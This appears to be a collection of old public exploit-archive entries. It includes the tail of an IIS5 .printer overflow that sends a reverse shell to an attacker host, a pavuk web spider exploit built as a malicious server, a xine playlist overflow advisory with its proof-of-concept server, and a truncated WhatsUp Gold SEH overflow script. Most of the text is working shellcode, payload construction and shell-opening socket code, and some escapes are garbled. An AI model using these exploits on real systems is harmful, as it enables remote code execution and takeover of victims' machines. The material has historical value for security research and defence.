"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\x f0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\x d6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\x fe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\x f9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\x f1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\x fa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\x c2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x 95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\x e1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\x e3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\x b3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
printf("iis5 remote .printer overflow.\n"
"dark spyrit <[email protected]> / beavuh labs.\n");
if (argc != 5){
printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
exit(1);
}
if ((ht = gethostbyname(argv[1])) == 0){
herror(argv[1]);
exit(1);
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
herror(argv[3]);
exit(1);
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
printf("\nconnecting... \n");
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
exit(1);
}
write(s, sploit, strlen(sploit));
sleep (1);
close (s);
printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
exit(0);
}
// [2001-05-08]
80 Pavuk Digest Authentication Buffer Overflow Remote Exploit
/*
* exploit for pavuk web spider - infamous42md AT hotpop DOT com
*
* shouts to mitakeet, skullandcircle, and thanks to matt murphy for making me
* realize a n00bish mistake i made.
*
* this exploit probably deserves a bit of an explanation as it was not exactly
* straight forward. the vulnerable code looks like this, with some comments
* inlined by me:
*/
#if 0
char *http_get_digest_auth_str(auth_digest, method, user, pass, urlp, buf)
http_digest_info *auth_digest;
char *method;
char *user;
char *pass;
url *urlp;
char *buf;
{
/* this is the buffer we bitch slap */
char pom[1024];
char *a1,*a2,*a3;
char *d = url_encode_str(urlp->p.http.document, URL_PATH_UNSAFE);
/* not yet */
sprintf(pom, "%s:%s:%s", user, auth_digest->realm, pass);
a1 = _md5(pom);
sprintf(pom, "%s:%s", method, d);
/* this turns into a 32 byte string */
a2 = _md5(pom);
/*
* this is the point that we overflow the buffer. we control
* auth_digest->nonce, and that is where all of our evil code go. but crap,
* look, the string a2 gets appended to the nonce buffer, that means
* whatever lives above the saved EIP we overwrite is going to get fuxxored
* to. that means the arguments to the function get trashed, usually not a
* problem, but look below at the following sprintf(). those variables get
* used again, so we have to restore them to a sane state.
*/
sprintf(pom, "%s:%s:%s", a1, auth_digest->nonce, a2);
a3 = _md5(pom);
/* crap */
sprintf(buf,
"Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\", response=\"%s\"" ,
user, auth_digest->realm, auth_digest->nonce, d, a3);
/* more crap, we need to repair nearly all of the parameters */
if (auth_digest->opaque)
{
strcat(buf, ", opaque=\"");
strcat(buf, auth_digest->opaque);
strcat(buf, "\"");
}
_free(d);
_free(a1);
_free(a2);
_free(a3);
return buf;
}
#endif
/*
* so u can see we can't just overflow and go. we need to recreate at least
* the auth_digest pointer, the user pointer, and the buf pointer. so, the
* strategy is as follows:
*
* + overwrite auth_digest to point into the buffer we control
* + where we point auth_digest must also contain valid pointers as they are
* used as the strings that get printed into buffer.
* + so we point those pointers towards the very end of our buffer. the
* strings they point to should not be so long. our buffer is NULL termed so if
* they point towards the end of it, we know they'll end at a set point.
* + we set the user pointer to the same place as the auth_digest pointer.
* + we set buf to point past the end of our buffer, at some higher address.
* that is where all the other strings get printed to in sprintf() and
* strcat().
* + and that's about it. so our buffer looks like this:
*
* <-------------------|
* ALIGN NOPS SHELL STRING_PTRS RETADDR USER_AND_DIGEST_PTRS BUF_PTRS
* |----------------------------^ |------^
*
* the only arg you pass is the base address of the buffer that we overwrite,
* which lays somewhere on the stack. note this is not the location of our
* original buffer, but the location of the pom variable from above func. and
* you need to be root as we bind to port 80 and pretend to be a webserver.
*
* [[email protected]] ./ps
* Usage: ./ps <base of nonce buffer>
*
* [[email protected]] ./ps 0xbfffdb34
* got a shell
*
* id
* uid=1000(n00b) gid=100(users) groups=100(users)
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#define die(x) do{ perror((x)); exit(1); }while(0)
#define SHELL_PORT 7000
#define HTTP_PORT 80
#define BS 0x1000
/* probably don't need all this */
char *reply =
"HTTP/1.1 401 Authorization Required\n"
"Date: Sat, 07 Aug 2004 02:10:07 GMT\n"
"Server: Apache/1.3.27 (Unix) PHP/4.3.1\n"
"WWW-Authenticate: Digest realm=\"time2die\" nonce=\"%s\"\n"
"Status: 401 Not Authorized\n"
"Connection: close\n"
"Content-Type: text/html\r\n\r\n";
/* call them */
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80";
int conn(struct sockaddr_in *sap)
{
int sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
die("socket");
if(connect(sock, (struct sockaddr *)sap, sizeof(*sap)) < 0)
die("connect");
return sock;
}
void shell(struct sockaddr_in *sap)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sap->sin_port = htons(SHELL_PORT);
sock = conn(sap);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
if ((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(1, buf, l) < 1)
die("write");
}
}
}
int do_listen()
{
int sock = 0, on = 1;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(HTTP_PORT);
sa.sin_addr.s_addr = INADDR_ANY;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
die("socket");
if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0)
die("setsockopt");
if(bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0)
die("bind");
if(listen(sock, 1) < 0)
die("listen");
return sock;
}
void sploit(int sock, struct sockaddr_in *sap, u_long nbase)
{
int len = 0, x;
char buf[BS], evil_nonce[BS];
u_long retaddr, ptrs_to_struct, fake_structs, new_buf;
memset(buf, 0, BS), memset(evil_nonce, 0, BS);
/* read the req */
if(recv(sock, buf, BS, 0) < 0)
die("read");
/* build the buffer */
#define ALIGN 3
#define NNOPS 100
#define SHELL_LEN 132
#define PTRS_OFFSET (ALIGN+NNOPS+SHELL_LEN) /* the string pointers */
#define PTRS_LEN 500
#define RET_OFFSET (PTRS_OFFSET+PTRS_LEN)
#define RET_LEN 288
#define PPTRS_OFFSET (RET_OFFSET+RET_LEN) /* the pointers to pointers */
#define PPTRS_LEN 20
#define BUF_OFFSET (PPTRS_OFFSET+PPTRS_LEN) /* the pointer to new buf */
#define BUF_LEN 20
#define TOTAL_LEN (BUF_OFFSET+BUF_LEN)
#define PTRS_LOC 1000 /* where the strings point to */
#define PPTRS_LOC 300 /* offset from base to the string pointers */
#define RET_LOC 50 /* offset of NOP buffer */
fake_structs = nbase + PTRS_LOC;
retaddr = nbase + RET_LOC;
ptrs_to_struct = nbase + PPTRS_LOC;
new_buf = nbase + TOTAL_LEN*2;
/* the NOPS and shellcode */
memset(evil_nonce, 'A', ALIGN);
memset(evil_nonce+ALIGN, 0x90, BS);
memcpy(evil_nonce+NNOPS+ALIGN, sc, SHELL_LEN);
/* the fake pointers point towards end of buffer */
for(x = 0; x < PTRS_LEN-3; x += sizeof(fake_structs))
memcpy(evil_nonce+PTRS_OFFSET+x, &fake_structs, sizeof(fake_structs));
/* the ret addr */
for(x = 0; x < RET_LEN; x += sizeof(retaddr))
memcpy(evil_nonce+RET_OFFSET+x, &retaddr, sizeof(retaddr));
/* the pointers to the fake pointers */
for(x = 0; x < PPTRS_LEN; x+= sizeof(ptrs_to_struct))
memcpy(evil_nonce+PPTRS_OFFSET+x, &ptrs_to_struct, sizeof(ptrs_to_struct));
/* and the new location for buf */
for(x = 0; x < BUF_LEN; x+= sizeof(new_buf))
memcpy(evil_nonce+BUF_OFFSET+x, &new_buf, sizeof(new_buf));
evil_nonce[TOTAL_LEN] = 0;
/* fill in HTTP reply */
len = snprintf(buf, BS-1, reply, evil_nonce);
/* i dont care what u request, you're getting the sploit */
if(send(sock, buf, len, 0) < 0)
die("send");
close(sock);
sleep(1);
shell(sap);
}
int main(int argc, char **argv)
{
int lsock, asock;
u_long nbase = 0;
struct sockaddr_in sa;
pid_t cpid;
socklen_t salen;
if(argc < 2){
fprintf(stderr, "\tUsage: %s <base of nonce buffer>\n", argv[0]);
return EXIT_FAILURE;
}
sscanf(argv[1], "%lx\n", &nbase);
lsock = do_listen();
while(1){
asock = accept(lsock, (struct sockaddr *)&sa, &salen);
if( (cpid = fork()) == 0)
sploit(asock, &sa, nbase);
else if(cpid < 0)
die("fork");
close(asock);
}
return EXIT_SUCCESS;
}
// [2004-08-08]
80 xine 0.99.2 Remote Stack Overflow Exploit
/*
************************************************** ************************************************** *************
$ An open security advisory #6 - Xine vcd MRL input identifier
management overflow
************************************************** ************************************************** *************
1: Bug Researcher: c0ntex[at]open-security.org
2: Bug Released: July 28th 2004
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote / Local
************************************************** ************************************************** *************
$ This advisory and/or proof of concept code must not be used for
commercial gain.
************************************************** ************************************************** *************
Xine - A free video player
http://xinehq.de
"xine is a free multimedia player. It plays back CDs, DVDs, and
VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from
local disk drives, and displays multimedia streamed over the
Internet. It interprets many of the most common multimedia formats available
- and some of the most uncommon formats, too."
Part 2 in the Media Mayhem saga, a name that was decided as being
aptly fitting for the "Media Player" security audit project that the Open
Security Group website started at the end of May. This project
continues finding remote exploits in popular media players for Windows and
Linux / UNIX derived systems.
Like the excellent Mplayer, Xine is a superb free media player for
Linux. Sadly there is a generic stack based buffer overflow in all versions
of Xine-lib, including Xine-lib-rc5 that allows for local and remote
malicious code execution.
By overflowing the vcd:// input source identifier buffer, it is
possible to modify the instruction pointer with a value that a malicious
attacker
can control. The issue can be replicated in a remote context by
embedding the input source idientifier within a playlist file, such as
an asx.
When a user plays the file, this stack overflow will occur, exploit
code can then be executed with the rights of the user running Xine.
The problem slightly increases due to a usability feature. It does
not have to be an asx extension for exploitation to succeed as Xine will try
to be clever and play any media type found, providing it's valid.
This still means the attack vector MUST include the .asx input
identifier but
it means you can not even trust URL's for .mp3, .mpeg, .mpg or .avi
media. As long as Xine finds a valid media header, it's happy to change
the demuxer reference and play the found media. In this case it's a
playlist file, ".asx", though others should work.
Any of the following demuxors will work when running against the
attached POC server:
xine --no-splash http://sunscreen/opensecurity.asx
xine --no-splash http://sunscreen/opensecurity.mp3
xine --no-splash http://sunscreen/opensecurity.mpg
xine --no-splash http://sunscreen/opensecurity.mpeg
xine --no-splash http://sunscreen/opensecurity.wma
xine --no-splash http://sunscreen/opensecurity.avi
xine --no-splash http://sunscreen/blah.blah
xine --no-splash http://sunscreen/
There are some tricks that may have to be pulled to allow for
successful code execution to work, primarily due to some memory corruption
that happens and opcode destruction. However it is easily defeated
by either jmp'ing over the corrupt few bytes or by placing the shellcode
into the buffer at some known good location.
An example malicious .asx file:
sunscreen$ cat open-security.asx
<asx version = "3.0">
<title>Open Security Media Archive</title>
<author>Brought to you by c0ntex[at]open-security.org</author>
<abstract>
SongList:
Track 1 - Open Security Rock(s) -> SOAD - Chop Suey
Track 2 - Open Security Rock(s) -> Media Mayhem Militia
</abstract>
<entry>
<title>System Of A Down - Chop Suey</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?004</copyright>
<Ref href = "http://sunscreen/SOAD-ChopSuey.mp3"/>
</entry>
<entry>
<title>All your media are belong to us!</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?004</copyright>
<Ref href = "vcd://
????> "/>
</entry>
</asx>
sunscreen$
---
Example POC run:
sunscreen$ gcc -o xinesmine xinesmine.c -lsocket -lnsl
sunscreen$ ./xinesmine -a 0 -p 80
** Xines_Mine - Remote proof of concept example **
[-] Uses .asx header reference to make Xine think it has valid
[-] reference file, then a crafted package is sent to overflow
[-] the vulnerable client && prove remote exploit concept.
[-] c0ntex[at]open-security.org {} http://www.open-security.org
-> Listening for a connection on port 80
[c0ntex@exploited xine]$ ./xine --no-splash
http://sunscreen/opensecurity.asx
This is xine (X11 gui) - a free video player v0.99.2.
(c) 2000-2004 The xine Team.
Playlist file (http://sunscreen/opensecurity.asx) is invalid.
WARN: could not retrieve file info for `image.nrg': No such file or
directory
WARN: init failed
WARN: open(
1?Ph//shh/bin??PS??1?:
File name too long
WARN: could not retrieve file info for `
1?Ph//shh/bin??PS??1?:
File name too long
WARN: init failed
bash-2.05$
Due to the many vulnerabilities being discovered in media players it
is advised not to play any form of music without first verifying its
integrity. It would be worth noting that P2P networks that are
currently sharing music, videos and films tend to be illegal media and as
such void any integrity anyway, I advise highly to stay clear from
IRC and P2P warez.
---
CVS log which details the bug perfectly can be found here:
->
http://sourceforge.net/mailarchive/forum.php?thread_id=5143955&forum_id=11923
Get the latest CVS of Xine-lib from here:
-> http://xinehq.de/index.php/releases
Get the Xine (XSA) advisory from here:
-> http://xinehq.de/index.php/security
Get this original advisory from here:
-> http://www.open-security.org/advisories/advisories.html
---
Xine bug discovered 22nd May 2004
Xine bug research completed 24th May 2004
Xine developers contacted 11th July 2004
Xine bug public release 8th August 2004
cheers
c0ntex[at]open-security.org
http://www.open-security.org
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifdef linux
#include <getopt.h>
#endif
#define SUCCESS0
#define FAILURE1
#define BUFFER1044
#define CDATA150
#define JMP200
#define THREAT"xine/1-rc5"
#define XPLOIT_OS Redhat9
#define example(OhNoo) fprintf(stderr, "Usage: ./xines_mine -a
<align_val> -p <port>nn", OhNoo);
void die(char * errtrap);
void banner(void);
int prepsock(int align_stack, int port);
int pkg_send(int clisock_fd, int align_stack, char * pload, char * payload);
int main(int argc, char ** argv);
static char * http[] = {
"HTTP/1.0 200 OKrn",
"Date: Thu, 23 May 2004 12:52:15 GMTrn",
"Server: Xines_Mine Server(Linux)rn",
"MIME-version: 1.0rn",
"Content-Type: audio/x-mpegurlrn",
"Content-Length: 2000rn",
"Connection: closern",
"rn"
};
static char * vcdmuxor[] = {
"<ASX version = "3.0">rn",
"<TITLE>Xines_Mine</TITLE>rn",
"<AUTHOR> c0ntex[at]open-security.org
www.open-security.org</AUTHOR>rn",
"<ENTRY>rn",
"<ref href="vcd://",
""/>rn",
"</ENTRY>rn",
"</ASX>rn",
"rn"
};
static char opcode[] =
"x31xc0x31xdbx50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcd"
"x80x31xc0x31xdbxfexc0xcdx80";
void
die(char * errtrap)
{
perror(errtrap);
_exit(FAILURE);
//exit(1);
}
void
banner(void)
{
fprintf(stderr, "n ** Xines_Mine - Remote proof of concept example
**nn");
fprintf(stderr, "[-] Uses .asx header reference to make Xine think it
has validn");
fprintf(stderr, "[-] reference file, then a crafted package is sent to
overflown");
fprintf(stderr, "[-] the vulnerable client && prove remote exploit
concept.n");
fprintf(stderr, "[-] c0ntex[at]open-security.org {}
http://www.open-security.org nn");
}
int
prepsock(int align_stack, int port)
{
unsigned int cl_buf, recv_chk, reuse = 1;
unsigned int clisock_fd;
signed int sock_fd;
static char chk_vuln[CDATA];
static char payload[BUFFER];
struct sockaddr_in victimised, xine;
char *pload = (char *) &opcode;
((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
? die("Could not create socket")
: (setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse,
sizeof(int)) == -1)
? die("Could not re-use socket")
: memset(&xine, 0, sizeof(xine));
xine.sin_family = AF_INET;
xine.sin_port = htons(port);
xine.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock_fd, (struct sockaddr *)&xine, sizeof(struct
sockaddr)) == -1) {
close(sock_fd); die("Could not bind socket");
}
if(listen(sock_fd, 0) == -1) {
close(sock_fd); die("Could not listen on socket");
}
printf(" -> Listening for a connection on port %dn", port);
cl_buf = sizeof(victimised);
clisock_fd = accept(sock_fd, (struct sockaddr *)&victimised,
&cl_buf);
if(!clisock_fd) {
die("Could not accept connectionn");
}
if(!close(sock_fd)) {
fprintf(stderr, "Could not close socketn");
}
fprintf(stderr, " -> Action: Attaching from host [%s]n",
inet_ntoa(victimised.sin_addr));
fprintf(stderr, " -> Using align [%d] and port [%d]n",
align_stack, port);
//memset(chk_vuln, 0, CDATA);
memset(chk_vuln, 0, sizeof(chk_vuln));
recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln), 0);
chk_vuln[recv_chk+1] = '';
if((recv_chk == -1) || (recv_chk == 0)) {
fprintf(stderr, "Could not receive data from clientn");
}
if(strstr(chk_vuln, THREAT)) {
fprintf(stderr, " -> Detected vulnerable Xine versionn");
}else{
fprintf(stderr, " -> Detected a non-Xine connection,
end.n");
close(clisock_fd); die("Ending connection, not a Xine clientn");
}
if(pkg_send(clisock_fd, align_stack, pload, payload) == 1) {
fprintf(stderr, "Could not send packagen");
close(clisock_fd); die("Could not send package!n");
}
if(close(clisock_fd) != 0) {
fprintf(stderr, "Could not close socketn");
}
return clisock_fd;
//return SUCCESS;
}
int
pkg_send(int clisock_fd, int align_stack, char * pload, char * payload)
{
unsigned int i = 0;
memset(payload, 0, BUFFER);
for(i = (BUFFER - JMP + align_stack); i < BUFFER; i += 4) {
payload = 0xbc;
payload[i+1] = 0xe7;
payload[i+2] = 0x7f;
payload[i+3] = 0xbf;
}
for (i = 0; i < (BUFFER - 33 - 20); i += 2) {//7 ) {
payload = 0x4d;
payload[i+1] = 0x45;
//payload[i+1] = 0x63;
//payload[i+1] = 0x30;
//payload[i+1] = 0x6e;
//payload[i+1] = 0x74;
//payload[i+1] = 0x65;
//payload[i+1] = 0x78;
//payload[i+1] = 0x90;
}
memcpy(payload + i, pload, strlen(pload));
payload[1045] = 0x00;
fprintf(stderr, " -> Payload size to send is [%4d]n",
strlen(payload));
fprintf(stderr, " -> Sending evil payload to our clientn");
fflush(stderr);
for (i = 0; i < 8; i++)
if(send(clisock_fd, http, strlen(http), 0) == -1) {
close(clisock_fd); die("Could not send HTTP
header");
}fprintf(stderr, "t- Sending valid HTTP header..n");
sleep(1);
for (i = 0; i < 5; i++)
if(send(clisock_fd, vcdmuxor, strlen(vcdmuxor),
0) == -1) {
close(clisock_fd); die("Could not send asx
header");
}fprintf(stderr, "t- Sending starter asx header..n");
sleep(1);
if(send(clisock_fd, payload, strlen(payload), 0) == -1) {
close(clisock_fd); die("Could not send payload");
}fprintf(stderr, "t- Sending payload package..n"); sleep(1);
for (i = 5; i < 9; i++)
if(send(clisock_fd, vcdmuxor, strlen(vcdmuxor),
0) == -1) {
close(clisock_fd); die("Could not send asx
header");
}fprintf(stderr, "t- Sending cleanup asx header..n");
return EXIT_SUCCESS;
}
int
main(int argc, char ** argv)
{
unsigned int align_stack = 0, port = 80;
unsigned int opts;
static char * exploit = NULL;
if(argc < 2) {
goto jumpout;
}banner();
while((opts = getopt(argc, argv, "a:p:")) != -1) {
switch(opts)
{
case 'a':
align_stack = atoi(optarg);
if((align_stack < 0) || (align_stack > 3)) {
goto jumpout;
}
break;
case 'p':
port = atoi(optarg);
if((port < 0) || (port > 65535)) {
goto jumpout;
}
break;
default:
goto jumpout;
break;
}
}
if(prepsock(align_stack, port) == -1) {
fprintf(stderr, "Errorn");
_exit(FAILURE);
} fprintf(stderr, " -> Test completenn");
return EXIT_SUCCESS;
jumpout:
banner();
example(exploit);
return EXIT_FAILURE;
}
// [2004-08-09]
80 IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured
Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny
Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an
exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,
Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01".
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\x ff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x 53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x 53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x 53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\x e2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\x e8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\x ff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\x ff";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type:
application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811; #815 -4
